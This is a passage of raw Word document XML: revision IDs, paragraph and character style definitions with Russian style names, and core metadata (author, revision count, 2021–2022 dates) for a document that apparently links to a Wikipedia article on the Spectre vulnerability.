    <w:rsid w:val="00EF6EFF"/>
    <w:rsid w:val="00EF75B8"/>
    <w:rsid w:val="00F01C16"/>
    <w:rsid w:val="00F02610"/>
    <w:rsid w:val="00F03032"/>
    <w:rsid w:val="00F03563"/>
    <w:rsid w:val="00F05257"/>
    <w:rsid w:val="00F100FF"/>
    <w:rsid w:val="00F1036C"/>
    <w:rsid w:val="00F127DB"/>
    <w:rsid w:val="00F148E5"/>
    <w:rsid w:val="00F14BFF"/>
    <w:rsid w:val="00F2001E"/>
    <w:rsid w:val="00F20C07"/>
    <w:rsid w:val="00F20F87"/>
    <w:rsid w:val="00F23D97"/>
    <w:rsid w:val="00F24D24"/>
    <w:rsid w:val="00F253BA"/>
    <w:rsid w:val="00F31D2D"/>
    <w:rsid w:val="00F3447F"/>
    <w:rsid w:val="00F35D2A"/>
    <w:rsid w:val="00F36967"/>
    <w:rsid w:val="00F37AF1"/>
    <w:rsid w:val="00F37CC4"/>
    <w:rsid w:val="00F41927"/>
    <w:rsid w:val="00F434FB"/>
    <w:rsid w:val="00F44160"/>
    <w:rsid w:val="00F44526"/>
    <w:rsid w:val="00F50FC1"/>
    <w:rsid w:val="00F52261"/>
    <w:rsid w:val="00F533D2"/>
    <w:rsid w:val="00F54B7C"/>
    <w:rsid w:val="00F54D8E"/>
    <w:rsid w:val="00F56CF5"/>
    <w:rsid w:val="00F57875"/>
    <w:rsid w:val="00F604BE"/>
    <w:rsid w:val="00F60AEF"/>
    <w:rsid w:val="00F6250A"/>
    <w:rsid w:val="00F62A9A"/>
    <w:rsid w:val="00F635CA"/>
    <w:rsid w:val="00F63C16"/>
    <w:rsid w:val="00F71A0F"/>
    <w:rsid w:val="00F722B1"/>
    <w:rsid w:val="00F728B7"/>
    <w:rsid w:val="00F7500D"/>
    <w:rsid w:val="00F75341"/>
    <w:rsid w:val="00F77C79"/>
    <w:rsid w:val="00F8060E"/>
    <w:rsid w:val="00F813FA"/>
    <w:rsid w:val="00F82435"/>
    <w:rsid w:val="00F83A8E"/>
    <w:rsid w:val="00F8456E"/>
    <w:rsid w:val="00F86D58"/>
    <w:rsid w:val="00F910ED"/>
    <w:rsid w:val="00F94E9B"/>
    <w:rsid w:val="00F951AB"/>
    <w:rsid w:val="00F951CC"/>
    <w:rsid w:val="00F95AA1"/>
    <w:rsid w:val="00F969BA"/>
    <w:rsid w:val="00F96DA7"/>
    <w:rsid w:val="00FA228A"/>
    <w:rsid w:val="00FA2F15"/>
    <w:rsid w:val="00FA4C4E"/>
    <w:rsid w:val="00FA5778"/>
    <w:rsid w:val="00FA6371"/>
    <w:rsid w:val="00FA6A4B"/>
    <w:rsid w:val="00FA6EC9"/>
    <w:rsid w:val="00FA7A1F"/>
    <w:rsid w:val="00FB0144"/>
    <w:rsid w:val="00FB036A"/>
    <w:rsid w:val="00FB0FAF"/>
    <w:rsid w:val="00FB3C5F"/>
    <w:rsid w:val="00FB45CF"/>
    <w:rsid w:val="00FB696B"/>
    <w:rsid w:val="00FB78B3"/>
    <w:rsid w:val="00FC0EBB"/>
    <w:rsid w:val="00FC1E20"/>
    <w:rsid w:val="00FC235A"/>
    <w:rsid w:val="00FC2C1C"/>
    <w:rsid w:val="00FC4155"/>
    <w:rsid w:val="00FC430B"/>
    <w:rsid w:val="00FC73DF"/>
    <w:rsid w:val="00FC76EF"/>
    <w:rsid w:val="00FD21F1"/>
    <w:rsid w:val="00FD2C6D"/>
    <w:rsid w:val="00FD362A"/>
    <w:rsid w:val="00FD47CB"/>
    <w:rsid w:val="00FD64C1"/>
    <w:rsid w:val="00FD70EE"/>
    <w:rsid w:val="00FE06E2"/>
    <w:rsid w:val="00FE0DCD"/>
    <w:rsid w:val="00FE17ED"/>
    <w:rsid w:val="00FE1C8D"/>
    <w:rsid w:val="00FE2F7B"/>
    <w:rsid w:val="00FE45AE"/>
    <w:rsid w:val="00FE697D"/>
    <w:rsid w:val="00FE6EDE"/>
    <w:rsid w:val="00FF21CB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74B3"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{0988FBAD-F847-4EF5-9140-A010822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B35"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:link w:val="10"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00627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6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A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A6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D07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Placeholder Text"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00C5178A"/>
    <w:rPr>
      <w:color w:val="808080"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a7">
    <w:name w:val="header"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="a8"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0010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726"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a9">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="aa"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0010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726"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="10">
    <w:name w:val="Заголовок 1 Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00627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B030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14F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E216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0155F"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ae">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="0032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351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347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ectre_(security_vulnerabilit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anch_predi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616C8D-8603-438B-ABF7-9BE1150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нюхин</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Никита Панюхин</cp:lastModifiedBy>
  <cp:revision>1275</cp:revision>
  <cp:lastPrinted>2022-01-05T18:51:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-10-13T14:32:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-11-05T12:20:00Z</dcterms:modified>
</cp:coreProperties>
</file>